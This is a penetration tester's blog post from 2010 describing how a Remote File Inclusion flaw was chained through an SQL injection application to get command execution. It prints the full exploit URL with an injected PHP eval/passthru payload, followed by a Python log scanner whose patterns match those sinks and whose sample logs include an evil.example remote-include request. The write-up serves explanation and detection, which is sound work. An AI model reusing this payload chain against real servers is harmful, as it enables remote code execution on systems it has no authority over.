Tuesday, January 12, 2010

RFI over SQL Injection/Cross-Site Scripting

An amusing attack came up in the course of our last penetration test. It is a good example of a practical application of Cross-Site Scripting. We had the following situation:

- A user segment, from which the attacker (me) operated;
- A technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Inclusion (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection by itself did not let us realize any useful threat or develop the attack further (here it is, the dreadful effect of privilege minimization!). Nor could we use the RFI vulnerability directly, because traffic leaving the technological segment towards the user segment and the outside world was strictly restricted. To exploit the RFI vulnerability anyway, a chain like the following was built:

http://<application_vulnerable_to_RFI>/?param=http://<application_vulnerable_to_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');

That is, each of these three vulnerabilities taken separately was useless. Only when they were combined for the common good did they let us realize an information security threat, namely execution of arbitrary commands on the server :)

All in all, there is nothing supernatural here, but I found this attack to be rather amusing...
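A defender's counterpart to the chain above, as an added example that is not part of the original post: a small Python scanner that parses combined-format access log lines, URL-decodes each query parameter, and recursively parses any parameter whose value is itself a URL. A remote-include parameter that carries a second URL with a UNION SELECT and inline PHP code is therefore reported as one chained request, not as a harmless absolute-URL argument. The hostnames, paths and log lines are constructed for the example; the `chain`/`rfi`/`sqli`/`code` tags are this example's own vocabulary.

```python
"""Detect chained RFI/SQLi probes in web-server access logs (added example).

Parses Apache/nginx combined-format lines, decodes every query parameter and,
when a parameter value is itself an absolute URL (the remote-include
indicator), parses that URL's query string as well, up to a small depth.
All hostnames, paths and log lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A parameter value that is a URL (or PHP stream wrapper) is the RFI indicator.
URL_VALUE_RE = re.compile(r'^(?:https?|ftps?)://|^(?:php|data):', re.IGNORECASE)
# Loose SQL injection marker: UNION ... SELECT within a short window.
SQLI_RE = re.compile(r'\bunion\b.{0,40}\bselect\b', re.IGNORECASE | re.DOTALL)
# Inline PHP tag or a command/eval sink, as used in the payload the post shows.
CODE_RE = re.compile(r'<\?|\b(?:eval|passthru|system|shell_exec)\s*\(', re.IGNORECASE)


def nested_values(target, depth=0, max_depth=5):
    """Yield (depth, name, value) for every query parameter of `target`,
    descending into parameter values that are themselves URLs."""
    if depth > max_depth:
        return
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second pass catches double-encoded values
        yield depth, name, value
        if URL_VALUE_RE.match(value):
            yield from nested_values(value, depth + 1, max_depth)


def analyse_request(target):
    """Return a sorted list of indicator tags for one request target.

    'rfi'   - some parameter value is an absolute URL
    'sqli'  - UNION SELECT seen in any (nested) value
    'code'  - PHP tag or eval/command sink seen in any (nested) value
    'chain' - sqli or code markers sit *inside* a URL-valued parameter,
              i.e. the request looks like RFI driven through a second app
    """
    tags = set()
    for depth, _name, value in nested_values(target):
        is_sqli = bool(SQLI_RE.search(value))
        is_code = bool(CODE_RE.search(value))
        if URL_VALUE_RE.match(value):
            tags.add('rfi')
        if is_sqli:
            tags.add('sqli')
        if is_code:
            tags.add('code')
        if depth >= 1 and (is_sqli or is_code):
            tags.add('chain')
    return sorted(tags)


def scan_log(lines):
    """Return (ip, target, tags) for every log line carrying indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        tags = analyse_request(m.group('target'))
        if tags:
            findings.append((m.group('ip'), m.group('target'), tags))
    return findings


# Constructed sample: benign, plain RFI, the chained request, plain SQLi.
SAMPLE_LOG = [
    '10.0.1.25 - - [12/Jan/2010:10:14:02 +0300] "GET /index.php?param=home HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.1.77 - - [12/Jan/2010:10:15:41 +0300] "GET /index.php?param=http%3A%2F%2Fevil.example%2Fs.txt HTTP/1.1" 200 88 "-" "curl/7.19"',
    '10.0.1.77 - - [12/Jan/2010:10:16:09 +0300] "GET /index.php?param=http%3A%2F%2Fapp-sqli.example%2F%3Fparam%3D1%2Bunion%2Bselect%2B%27%3C%3Feval(%24_request%5Bcmd%5D)%3B%3F%3E%27&cmd=passthru(%27ls%27)%3B HTTP/1.1" 200 412 "-" "curl/7.19"',
    '10.0.1.77 - - [12/Jan/2010:10:17:30 +0300] "GET /index.php?param=1%27+union+select+1%2C2-- HTTP/1.1" 500 0 "-" "curl/7.19"',
]

if __name__ == '__main__':
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(ip, tags, target[:60])
```

The scanner only reports; the fix for the first link of the chain is on the RFI side. In PHP the include target can only be fetched over HTTP when `allow_url_include` (and `allow_url_fopen`) is enabled, so turning those off and resolving the include parameter against a fixed allowlist of local files removes the remote-include step regardless of what the SQLi application can be made to echo. The egress filtering the post describes is still worthwhile: it forced the attacker to find a second in-segment host, and that second hop is exactly what makes the chained request stand out in the logs.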

2 comments:

  1. Chaining these kinds of attacks gives unlimited variation in how to attack enterprise networks.

    here is another interesting one:
    https://www.wechall.net/challenge/Z/CCCP/index.php

    In this attack the attacker can extract a whole database if he/she has no direct access to it...

  2. Informative article. I am impressed with the unique writing style. Thanks for sharing it here :)

    PhD thesis writing